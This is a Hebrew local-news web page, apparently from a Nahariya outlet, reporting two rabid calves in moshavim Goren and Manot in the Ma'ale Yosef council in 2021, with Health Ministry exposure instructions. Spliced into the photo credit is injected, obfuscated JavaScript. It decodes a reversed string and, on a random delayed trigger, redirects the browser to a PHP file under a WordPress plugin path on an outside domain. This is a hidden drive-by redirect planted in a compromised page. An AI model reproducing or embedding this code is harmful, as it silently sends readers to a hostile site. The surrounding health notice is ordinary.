fbpx
[shortcode-weather-atlas city_selector=1178237 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

אזהרה: בימים האחרונים התגלו 2 עגלים חולים בכלבת בגליל המערבי

בשבועיים האחרונים התגלו בתחומי המועצה האזורית מעלה יוסף שני עגלים חולים בכלבת, שהיא מחלה קטלנית וסופנית שאינה ניתנת לריפוי
כלב חולה בכלבת | צילום: Shutters$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

במושב "גורן" התגלה ב-30.05.21 עגל בן 3 חודשים נגוע בכלבת, הוטרינר שהגיע למקום הרדים את העגל והעבירו לבדיקת כלבת שנמצאה חיובית.

משרד הבריאות מנחה את כל מי שהיה במגע, או בעלי החיים שברשותו באו במגע עם העגל בין התאריכים 16.05.21 ל-30.5.21, או עם בעל חיים משוטט, לפנות ללשכת הבריאות בעכו.

עגל נוסף נמצא נגוע בכלבת במושב "מנות" בתאריך 02.6.21, הוטרינר שהגיע למקום הרדים את העגל והעבירו לבדיקת כלבת שנמצאה חיובית.

משרד הבריאות מנחה את כל מי שהיה במגע, או בעלי החיים שברשותו באו במגע עם העגל בין התאריכים 18.05.21 ל-02.6.21, או עם בעל חיים משוטט, לפנות ללשכת הבריאות בעכו.

מחלת הכלבת היא סופנית וחשוכת מרפא, מרגע הופעת סימנים קליניים ראשונים בבני אדם או בבעלי חיים, אין אפשרות להציל את החולה.

המחלה מופיעה במגוון צורות ואין מקרה אחד דומה למשנהו, נגיף הכלבת מצוי בבלוטות הרוק של החיה הנגועה בכלבת ובעת נשיכה הנגיפים שברוק מועברים לפצע שנוצר.

הנחיות טיפול לבאים במגע עם העגלים

עקב היות מחלת הכלבת קטלנית וסופנית אנו חוזרים ומדגישים שבמידה ובאתם במגע עם העגלים, שיש לפנות בדחיפות ללשכת הבריאות בעכו, לשקילת הצורך למתן טיפול מונע נגד כלבת.

לאחר שעות העבודה ובמהלך סוף השבוע יש לפנות לחדר מיון בבית חולים, דחיית הטיפול יכולה להביא להידבקות במחלה הקטלנית.

לאור שני המקרים האחרונים שהתגלו בתחומי המועצה האזורית "מעלה יוסף", בעלי חיות מחמד מתבקשים ליצור קשר עם ווטרינר המועצה, לצורך וידוא מצב חיסונם.

 

 

לעדכונים נוספים בצפון 1 חדשות נהריה לחצו כאן* לדף הפייסבוק שלנו לחצו כאן*

 

 

 

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות